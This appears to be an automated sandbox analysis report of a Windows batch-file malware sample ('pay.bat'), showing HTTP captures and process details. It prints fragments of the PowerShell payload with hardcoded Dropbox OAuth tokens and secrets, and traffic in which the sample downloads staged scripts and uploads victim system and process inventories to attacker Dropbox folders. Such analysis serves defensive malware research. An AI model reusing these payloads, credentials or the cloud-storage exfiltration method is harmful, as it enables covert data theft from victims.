                                                                                                                            2024-11-27 07:29:04 UTC260OUTGET /scl/fi/g7mcshkx3qmo5mvytf2ct/santa2-x.txt?rlkey=5nbbqegc5a77r76hiym6s9y2h&st=727cs1mx&dl=0 HTTP/1.1
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                            Host: dl.dropboxusercontent.com
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2024-11-27 07:29:05 UTC1108INHTTP/1.1 200 OK
                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Cache-Control: max-age=60
                                                                                                                            Content-Disposition: inline; filename="santa2-x.txt"; filename*=UTF-8''santa2-x.txt
                                                                                                                            Content-Security-Policy: report-uri https://www.dropbox.com/csp_log?policy_name=blockserver-usercontent ; sandbox allow-forms allow-scripts allow-top-navigation allow-popups
                                                                                                                            Content-Security-Policy: form-action 'none' ; report-uri https://www.dropbox.com/csp_log?policy_name=blockserver-noscript ; script-src 'none'
                                                                                                                            Etag: 1730966739663276n
                                                                                                                            Pragma: public
                                                                                                                            Set-Cookie: uc_session=eIJrvqPCrUqOF87Yo3n1JMNjGY3lcBncJmHLj34ZvyWkBpNllHjVCg65pZiQQQiA; Domain=dropboxusercontent.com; HttpOnly; Path=/; SameSite=None; Secure
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-Server-Response-Time: 565
                                                                                                                            Date: Wed, 27 Nov 2024 07:29:04 GMT
                                                                                                                            Server: envoy
                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                            X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                            Content-Length: 1532
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            X-Dropbox-Response-Origin: far_remote
                                                                                                                            X-Dropbox-Request-Id: 3c3b89c8d71b499fa0d0d38241be968f
                                                                                                                            Connection: close
                                                                                                                            2024-11-27 07:29:05 UTC1532INData Raw: 24 74 74 74 74 74 74 74 74 74 74 74 74 74 74 74 74 74 74 74 74 74 74 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 20 3d 20 24 65 6e 76 3a 41 70 70 44 61 74 61 3b 0d 0a 0d 0a 24 74 6f 6b 65 6e 52 65 71 75 65 73 74 50 61 72 61 6d 73 20 3d 20 40 7b 0d 0a 20 20 20 20 67 72 61 6e 74 5f 74 79 70 65 20 20 20 20 3d 20 22 72 65 66 72 65 73 68 5f 74 6f 6b 65 6e 22 0d 0a 20 20 20 20 72 65 66 72 65 73 68 5f 74 6f 6b 65 6e 20 3d 20 22 43 78 52 37 36 46 41 70 32 4a 41 41 41 41 41 41 41 41 41 41 41 59 63 2d 5a 36 45 45 55 6d 31 73 43 6b 49 6e 5a 6e 43 73 48 52 51 4b 43 70 35 6c 4f 53 4b 42 4d 69 70 43 45 75 64 6e 67 63 2d 6c 22 3b 0d 0a 20 20 20 20 63 6c 69 65 6e 74 5f 69 64 20 20 20 20 20 3d 20 20 22 38 61 7a 71 73 72 67 78 73 64 38 66 77 72 67 22 0d 0a
                                                                                                                            Data Ascii: $ttttttttttttttttttttttpppppppppppppppppppp = $env:AppData;$tokenRequestParams = @{ grant_type = "refresh_token" refresh_token = "CxR76FAp2JAAAAAAAAAAAYc-Z6EEUm1sCkInZnCsHRQKCp5lOSKBMipCEudngc-l"; client_id = "8azqsrgxsd8fwrg"


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            1192.168.2.449731162.125.65.154435480C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-27 07:29:05 UTC260OUTGET /scl/fi/dkuamlrlsrbygso1swn8p/santa2-f.txt?rlkey=r8fe0viier1mwv9azk5awy5s9&st=yvqqfdfy&dl=0 HTTP/1.1
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                            Host: dl.dropboxusercontent.com
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2024-11-27 07:29:06 UTC1108INHTTP/1.1 200 OK
                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Cache-Control: max-age=60
                                                                                                                            Content-Disposition: inline; filename="santa2-f.txt"; filename*=UTF-8''santa2-f.txt
                                                                                                                            Content-Security-Policy: report-uri https://www.dropbox.com/csp_log?policy_name=blockserver-usercontent ; sandbox allow-forms allow-scripts allow-top-navigation allow-popups
                                                                                                                            Content-Security-Policy: form-action 'none' ; report-uri https://www.dropbox.com/csp_log?policy_name=blockserver-noscript ; script-src 'none'
                                                                                                                            Etag: 1730966741353279n
                                                                                                                            Pragma: public
                                                                                                                            Set-Cookie: uc_session=8ymvPUwVcX5hBOFXdt81mFUbgqLKLXt9bgdwlnrtN4gfOt3Oj3B29UbkNayuY1jg; Domain=dropboxusercontent.com; HttpOnly; Path=/; SameSite=None; Secure
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-Server-Response-Time: 368
                                                                                                                            Date: Wed, 27 Nov 2024 07:29:05 GMT
                                                                                                                            Server: envoy
                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                            X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                            Content-Length: 2318
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            X-Dropbox-Response-Origin: far_remote
                                                                                                                            X-Dropbox-Request-Id: e0a0112e9f3d496cad6b4e20b22e3e31
                                                                                                                            Connection: close
                                                                                                                            2024-11-27 07:29:06 UTC2318INData Raw: 0d 0a 24 74 74 74 74 74 74 74 74 74 74 74 74 74 74 74 74 74 74 74 74 74 74 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 20 3d 20 24 65 6e 76 3a 41 70 70 44 61 74 61 3b 0d 0a 0d 0a 24 74 6f 6b 65 6e 52 65 71 75 65 73 74 50 61 72 61 6d 73 20 3d 20 40 7b 0d 0a 20 20 20 20 67 72 61 6e 74 5f 74 79 70 65 20 20 20 20 3d 20 22 72 65 66 72 65 73 68 5f 74 6f 6b 65 6e 22 0d 0a 20 20 20 20 72 65 66 72 65 73 68 5f 74 6f 6b 65 6e 20 3d 20 22 43 78 52 37 36 46 41 70 32 4a 41 41 41 41 41 41 41 41 41 41 41 59 63 2d 5a 36 45 45 55 6d 31 73 43 6b 49 6e 5a 6e 43 73 48 52 51 4b 43 70 35 6c 4f 53 4b 42 4d 69 70 43 45 75 64 6e 67 63 2d 6c 22 3b 0d 0a 20 20 20 20 63 6c 69 65 6e 74 5f 69 64 20 20 20 20 20 3d 20 20 22 38 61 7a 71 73 72 67 78 73 64 38 66 77 72 67 22
                                                                                                                            Data Ascii: $ttttttttttttttttttttttpppppppppppppppppppp = $env:AppData;$tokenRequestParams = @{ grant_type = "refresh_token" refresh_token = "CxR76FAp2JAAAAAAAAAAAYc-Z6EEUm1sCkInZnCsHRQKCp5lOSKBMipCEudngc-l"; client_id = "8azqsrgxsd8fwrg"


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            2192.168.2.449732162.125.69.194432124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-27 07:29:07 UTC246OUTPOST /oauth2/token HTTP/1.1
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Host: api.dropboxapi.com
                                                                                                                            Content-Length: 159
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2024-11-27 07:29:07 UTC159OUTData Raw: 67 72 61 6e 74 5f 74 79 70 65 3d 72 65 66 72 65 73 68 5f 74 6f 6b 65 6e 26 63 6c 69 65 6e 74 5f 69 64 3d 38 61 7a 71 73 72 67 78 73 64 38 66 77 72 67 26 63 6c 69 65 6e 74 5f 73 65 63 72 65 74 3d 6a 6a 61 71 76 38 35 62 6d 6b 6e 72 37 73 74 26 72 65 66 72 65 73 68 5f 74 6f 6b 65 6e 3d 43 78 52 37 36 46 41 70 32 4a 41 41 41 41 41 41 41 41 41 41 41 59 63 2d 5a 36 45 45 55 6d 31 73 43 6b 49 6e 5a 6e 43 73 48 52 51 4b 43 70 35 6c 4f 53 4b 42 4d 69 70 43 45 75 64 6e 67 63 2d 6c
                                                                                                                            Data Ascii: grant_type=refresh_token&client_id=8azqsrgxsd8fwrg&client_secret=jjaqv85bmknr7st&refresh_token=CxR76FAp2JAAAAAAAAAAAYc-Z6EEUm1sCkInZnCsHRQKCp5lOSKBMipCEudngc-l
                                                                                                                            2024-11-27 07:29:07 UTC433INHTTP/1.1 200 OK
                                                                                                                            Content-Type: application/json
                                                                                                                            Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                            Expires: 0
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            X-Server-Response-Time: 26
                                                                                                                            Date: Wed, 27 Nov 2024 07:29:07 GMT
                                                                                                                            Server: envoy
                                                                                                                            Content-Length: 208
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            X-Dropbox-Response-Origin: far_remote
                                                                                                                            X-Dropbox-Request-Id: db67f2f6ee7d4c6d8da9bd9976c0403e
                                                                                                                            Connection: close
                                                                                                                            2024-11-27 07:29:07 UTC208INData Raw: 7b 22 61 63 63 65 73 73 5f 74 6f 6b 65 6e 22 3a 20 22 73 6c 2e 43 42 64 72 68 74 41 32 69 37 4d 41 4e 49 70 77 36 4c 56 30 35 63 70 53 4f 6f 4c 64 76 38 4c 76 6e 6f 59 39 56 6b 47 46 67 37 59 6c 42 62 37 37 67 51 72 4d 63 73 46 39 6d 35 35 54 62 4f 61 66 6f 56 54 76 38 6e 61 43 6a 55 62 56 77 74 78 63 37 6a 62 58 6f 75 54 65 55 33 4b 38 68 45 74 6a 37 76 42 58 66 57 42 36 62 6d 63 43 73 35 67 79 61 72 41 44 39 51 51 4d 30 62 78 33 36 4a 32 59 38 4b 30 33 50 6e 2d 6b 6e 36 72 53 22 2c 20 22 74 6f 6b 65 6e 5f 74 79 70 65 22 3a 20 22 62 65 61 72 65 72 22 2c 20 22 65 78 70 69 72 65 73 5f 69 6e 22 3a 20 31 34 34 30 30 7d
                                                                                                                            Data Ascii: {"access_token": "sl.CBdrhtA2i7MANIpw6LV05cpSOoLdv8LvnoY9VkGFg7YlBb77gQrMcsF9m55TbOafoVTv8naCjUbVwtxc7jbXouTeU3K8hEtj7vBXfWB6bmcCs5gyarAD9QQM0bx36J2Y8K03Pn-kn6rS", "token_type": "bearer", "expires_in": 14400}


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            3192.168.2.449733162.125.69.194435480C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-27 07:29:07 UTC246OUTPOST /oauth2/token HTTP/1.1
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Host: api.dropboxapi.com
                                                                                                                            Content-Length: 159
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2024-11-27 07:29:07 UTC159OUTData Raw: 67 72 61 6e 74 5f 74 79 70 65 3d 72 65 66 72 65 73 68 5f 74 6f 6b 65 6e 26 63 6c 69 65 6e 74 5f 69 64 3d 38 61 7a 71 73 72 67 78 73 64 38 66 77 72 67 26 63 6c 69 65 6e 74 5f 73 65 63 72 65 74 3d 6a 6a 61 71 76 38 35 62 6d 6b 6e 72 37 73 74 26 72 65 66 72 65 73 68 5f 74 6f 6b 65 6e 3d 43 78 52 37 36 46 41 70 32 4a 41 41 41 41 41 41 41 41 41 41 41 59 63 2d 5a 36 45 45 55 6d 31 73 43 6b 49 6e 5a 6e 43 73 48 52 51 4b 43 70 35 6c 4f 53 4b 42 4d 69 70 43 45 75 64 6e 67 63 2d 6c
                                                                                                                            Data Ascii: grant_type=refresh_token&client_id=8azqsrgxsd8fwrg&client_secret=jjaqv85bmknr7st&refresh_token=CxR76FAp2JAAAAAAAAAAAYc-Z6EEUm1sCkInZnCsHRQKCp5lOSKBMipCEudngc-l
                                                                                                                            2024-11-27 07:29:08 UTC433INHTTP/1.1 200 OK
                                                                                                                            Content-Type: application/json
                                                                                                                            Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                            Expires: 0
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            X-Server-Response-Time: 21
                                                                                                                            Date: Wed, 27 Nov 2024 07:29:07 GMT
                                                                                                                            Server: envoy
                                                                                                                            Content-Length: 208
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            X-Dropbox-Response-Origin: far_remote
                                                                                                                            X-Dropbox-Request-Id: 231300aea2264a9bbb2f695e3d04ecc2
                                                                                                                            Connection: close
                                                                                                                            2024-11-27 07:29:08 UTC208INData Raw: 7b 22 61 63 63 65 73 73 5f 74 6f 6b 65 6e 22 3a 20 22 73 6c 2e 43 42 66 6d 34 6a 62 41 65 36 50 61 45 4d 2d 58 5f 57 42 30 61 79 36 76 48 6b 6e 45 70 63 66 74 75 43 77 75 35 52 6f 6a 72 4a 55 43 51 46 47 54 4c 33 48 37 47 6e 73 75 70 75 78 77 30 56 53 34 36 33 73 6e 5f 63 47 30 34 77 7a 37 71 4d 72 48 4f 56 74 73 79 42 4e 5f 79 52 73 66 55 6e 75 38 49 32 42 52 6e 79 74 37 57 71 38 41 6e 52 2d 51 49 66 61 58 65 70 50 4d 75 6f 31 4e 6b 35 30 68 57 6b 35 38 35 62 62 78 4a 76 4a 67 22 2c 20 22 74 6f 6b 65 6e 5f 74 79 70 65 22 3a 20 22 62 65 61 72 65 72 22 2c 20 22 65 78 70 69 72 65 73 5f 69 6e 22 3a 20 31 34 34 30 30 7d
                                                                                                                            Data Ascii: {"access_token": "sl.CBfm4jbAe6PaEM-X_WB0ay6vHknEpcftuCwu5RojrJUCQFGTL3H7Gnsupuxw0VS463sn_cG04wz7qMrHOVtsyBN_yRsfUnu8I2BRnyt7Wq8AnR-QIfaXepPMuo1Nk50hWk585bbxJvJg", "token_type": "bearer", "expires_in": 14400}


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            4192.168.2.449734162.125.69.144432124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-27 07:29:10 UTC551OUTPOST /2/files/upload HTTP/1.1
                                                                                                                            Authorization: Bearer sl.CBdrhtA2i7MANIpw6LV05cpSOoLdv8LvnoY9VkGFg7YlBb77gQrMcsF9m55TbOafoVTv8naCjUbVwtxc7jbXouTeU3K8hEtj7vBXfWB6bmcCs5gyarAD9QQM0bx36J2Y8K03Pn-kn6rS
                                                                                                                            Dropbox-API-Arg: { "path": "/githut/santa2_persist/192.168.2.4-1127_0234-XXX-santa2.txt", "mode": "add", "autorename": true, "mute": false }
                                                                                                                            Content-Type: application/octet-stream
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                            Host: content.dropboxapi.com
                                                                                                                            Content-Length: 14
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2024-11-27 07:29:10 UTC14OUTData Raw: ff fe 78 00 6d 00 69 00 6c 00 0d 00 0a 00
                                                                                                                            Data Ascii: xmil
                                                                                                                            2024-11-27 07:29:11 UTC468INHTTP/1.1 200 OK
                                                                                                                            Content-Type: application/json
                                                                                                                            Cache-Control: no-cache
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-Server-Response-Time: 626
                                                                                                                            Date: Wed, 27 Nov 2024 07:29:11 GMT
                                                                                                                            Server: envoy
                                                                                                                            Content-Length: 488
                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                            X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            X-Dropbox-Response-Origin: far_remote
                                                                                                                            X-Dropbox-Request-Id: ce9a083d49864cccbf89208e89a74b08
                                                                                                                            Connection: close
                                                                                                                            2024-11-27 07:29:11 UTC488INData Raw: 7b 22 6e 61 6d 65 22 3a 20 22 31 39 32 2e 31 36 38 2e 32 2e 34 2d 31 31 32 37 5f 30 32 33 34 2d 58 58 58 2d 73 61 6e 74 61 32 2e 74 78 74 22 2c 20 22 70 61 74 68 5f 6c 6f 77 65 72 22 3a 20 22 2f 67 69 74 68 75 74 2f 73 61 6e 74 61 32 5f 70 65 72 73 69 73 74 2f 31 39 32 2e 31 36 38 2e 32 2e 34 2d 31 31 32 37 5f 30 32 33 34 2d 78 78 78 2d 73 61 6e 74 61 32 2e 74 78 74 22 2c 20 22 70 61 74 68 5f 64 69 73 70 6c 61 79 22 3a 20 22 2f 67 69 74 68 75 74 2f 73 61 6e 74 61 32 5f 70 65 72 73 69 73 74 2f 31 39 32 2e 31 36 38 2e 32 2e 34 2d 31 31 32 37 5f 30 32 33 34 2d 58 58 58 2d 73 61 6e 74 61 32 2e 74 78 74 22 2c 20 22 69 64 22 3a 20 22 69 64 3a 77 54 5f 45 46 74 4e 6c 6f 4a 45 41 41 41 41 41 41 41 41 58 79 41 22 2c 20 22 63 6c 69 65 6e 74 5f 6d 6f 64 69 66 69 65
                                                                                                                            Data Ascii: {"name": "192.168.2.4-1127_0234-XXX-santa2.txt", "path_lower": "/githut/santa2_persist/192.168.2.4-1127_0234-xxx-santa2.txt", "path_display": "/githut/santa2_persist/192.168.2.4-1127_0234-XXX-santa2.txt", "id": "id:wT_EFtNloJEAAAAAAAAXyA", "client_modifie


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            5192.168.2.449735162.125.69.144435480C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-27 07:29:10 UTC552OUTPOST /2/files/upload HTTP/1.1
                                                                                                                            Authorization: Bearer sl.CBfm4jbAe6PaEM-X_WB0ay6vHknEpcftuCwu5RojrJUCQFGTL3H7Gnsupuxw0VS463sn_cG04wz7qMrHOVtsyBN_yRsfUnu8I2BRnyt7Wq8AnR-QIfaXepPMuo1Nk50hWk585bbxJvJg
                                                                                                                            Dropbox-API-Arg: { "path": "/github/santa2_first/192.168.2.4-1127_0234-RRR-santa2.txt", "mode": "add", "autorename": true, "mute": false }
                                                                                                                            Content-Type: application/octet-stream
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                            Host: content.dropboxapi.com
                                                                                                                            Content-Length: 49412
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2024-11-27 07:29:10 UTC10000OUTData Raw: ff fe 0d 00 0a 00 53 00 75 00 6e 00 64 00 61 00 79 00 2c 00 20 00 53 00 65 00 70 00 74 00 65 00 6d 00 62 00 65 00 72 00 20 00 32 00 34 00 2c 00 20 00 32 00 30 00 32 00 33 00 20 00 38 00 3a 00 30 00 30 00 3a 00 30 00 33 00 20 00 41 00 4d 00 0d 00 0a 00 0d 00 0a 00 0d 00 0a 00 0d 00 0a 00 43 00 61 00 70 00 74 00 69 00 6f 00 6e 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 20 00 20 00 20 00 20 00 42 00 75 00 69 00 6c 00 64 00 4e 00 75 00 6d 00 62 00 65 00 72 00 20 00 4f 00 53 00 41 00 72 00 63 00 68 00 69 00 74 00 65 00 63 00 74 00 75 00 72 00 65 00 0d 00 0a 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20
                                                                                                                            Data Ascii: Sunday, September 24, 2023 8:00:03 AMCaption Version BuildNumber OSArchitecture-------
                                                                                                                            2024-11-27 07:29:10 UTC16355OUTData Raw: 38 00 36 00 30 00 20 00 20 00 20 00 20 00 20 00 20 00 32 00 36 00 35 00 32 00 34 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 31 00 2e 00 30 00 38 00 20 00 20 00 20 00 33 00 34 00 32 00 30 00 20 00 20 00 20 00 31 00 20 00 73 00 69 00 68 00 6f 00 73 00 74 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 34 00 30 00 33 00 20 00 20 00 20 00 20 00 20 00 20 00 32 00 33 00 20 00 20 00 20 00 20 00 20 00 37 00 39 00 39 00 32 00 20 00 20 00 20 00 20
                                                                                                                            Data Ascii: 860 26524 1.08 3420 1 sihost 403 23 7992
                                                                                                                            2024-11-27 07:29:10 UTC3645OUTData Raw: 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 35 00 35 00 32 00 20 00 20 00 20 00 20 00 20 00 20 00 32 00 33 00 20 00 20 00 20 00 20 00 20 00 39 00 30 00 37 00 36 00 20 00 20 00 20 00 20 00 20 00 20 00 33 00 39 00 35 00 30 00 30 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 30 00 2e 00 30 00 39 00 20 00 20 00 20 00 33 00 37 00 38 00 38 00 20 00 20 00 20 00 31 00 20 00 54 00 65 00 78 00 74 00 49 00 6e 00 70 00 75 00 74 00 48 00 6f 00 73 00 74 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00
                                                                                                                            Data Ascii: 552 23 9076 39500 0.09 3788 1 TextInputHost
                                                                                                                            2024-11-27 07:29:10 UTC16355OUTData Raw: 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 31 00 30 00 36 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 39 00 20 00 20 00 20 00 20 00 20 00 31 00 32 00 32 00 34 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 36 00 36 00 30 00 38 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 30 00 2e 00 30 00 32 00 20 00 20 00 20 00 33 00 31 00 30 00 34 00 20 00 20 00 20 00 31 00 20 00 54 00 6f 00 54 00 70 00 41 00 65 00 4c 00 59 00 51 00 46 00 47 00 44 00 69 00 6f 00 69 00 48 00 62 00 66 00 43 00 73 00 66 00 69 00 70 00 49 00 43 00 74 00 46 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20
                                                                                                                            Data Ascii: 106 9 1224 6608 0.02 3104 1 ToTpAeLYQFGDioiHbfCsfipICtF
                                                                                                                            2024-11-27 07:29:10 UTC3057OUTData Raw: 00 37 00 30 00 35 00 36 00 20 00 20 00 20 00 31 00 20 00 54 00 6f 00 54 00 70 00 41 00 65 00 4c 00 59 00 51 00 46 00 47 00 44 00 69 00 6f 00 69 00 48 00 62 00 66 00 43 00 73 00 66 00 69 00 70 00 49 00 43 00 74 00 46 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 31 00 30 00 36 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 39 00 20 00 20 00 20 00 20 00 20 00 31 00 32 00 32 00 30 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 36 00 35 00 39 00 32 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 30 00 2e 00 30 00 32 00 20 00 20 00 20 00 37 00 30 00 38 00 30 00 20 00 20 00
                                                                                                                            Data Ascii: 7056 1 ToTpAeLYQFGDioiHbfCsfipICtF 106 9 1220 6592 0.02 7080
                                                                                                                            2024-11-27 07:29:12 UTC469INHTTP/1.1 200 OK
                                                                                                                            Content-Type: application/json
                                                                                                                            Cache-Control: no-cache
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-Server-Response-Time: 1039
                                                                                                                            Date: Wed, 27 Nov 2024 07:29:12 GMT
                                                                                                                            Server: envoy
                                                                                                                            Content-Length: 487
                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                            X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            X-Dropbox-Response-Origin: far_remote
                                                                                                                            X-Dropbox-Request-Id: 1efc2f16f2864fc69a1e265559722e08
                                                                                                                            Connection: close
                                                                                                                            2024-11-27 07:29:12 UTC487INData Raw: 7b 22 6e 61 6d 65 22 3a 20 22 31 39 32 2e 31 36 38 2e 32 2e 34 2d 31 31 32 37 5f 30 32 33 34 2d 52 52 52 2d 73 61 6e 74 61 32 2e 74 78 74 22 2c 20 22 70 61 74 68 5f 6c 6f 77 65 72 22 3a 20 22 2f 67 69 74 68 75 62 2f 73 61 6e 74 61 32 5f 66 69 72 73 74 2f 31 39 32 2e 31 36 38 2e 32 2e 34 2d 31 31 32 37 5f 30 32 33 34 2d 72 72 72 2d 73 61 6e 74 61 32 2e 74 78 74 22 2c 20 22 70 61 74 68 5f 64 69 73 70 6c 61 79 22 3a 20 22 2f 67 69 74 68 75 62 2f 73 61 6e 74 61 32 5f 66 69 72 73 74 2f 31 39 32 2e 31 36 38 2e 32 2e 34 2d 31 31 32 37 5f 30 32 33 34 2d 52 52 52 2d 73 61 6e 74 61 32 2e 74 78 74 22 2c 20 22 69 64 22 3a 20 22 69 64 3a 77 54 5f 45 46 74 4e 6c 6f 4a 45 41 41 41 41 41 41 41 41 58 79 51 22 2c 20 22 63 6c 69 65 6e 74 5f 6d 6f 64 69 66 69 65 64 22 3a 20
                                                                                                                            Data Ascii: {"name": "192.168.2.4-1127_0234-RRR-santa2.txt", "path_lower": "/github/santa2_first/192.168.2.4-1127_0234-rrr-santa2.txt", "path_display": "/github/santa2_first/192.168.2.4-1127_0234-RRR-santa2.txt", "id": "id:wT_EFtNloJEAAAAAAAAXyQ", "client_modified":


                                                                                                                            Statistics

                                                                                                                            CPU Usage

                                                                                                                            Click to jump to process

                                                                                                                            Memory Usage

                                                                                                                            Click to jump to process

                                                                                                                            High Level Behavior Distribution

                                                                                                                            Click to dive into process behavior distribution

                                                                                                                            Behavior

                                                                                                                            Click to jump to process

                                                                                                                            System Behavior

                                                                                                                            General

                                                                                                                            Target ID:0
                                                                                                                            Start time:02:28:57
                                                                                                                            Start date:27/11/2024
                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pay.bat" "
                                                                                                                            Imagebase:0x7ff693530000
                                                                                                                            File size:289'792 bytes
                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:1
                                                                                                                            Start time:02:28:57
                                                                                                                            Start date:27/11/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:2
                                                                                                                            Start time:02:28:57
                                                                                                                            Start date:27/11/2024
                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            Wow64 process (32bit):false
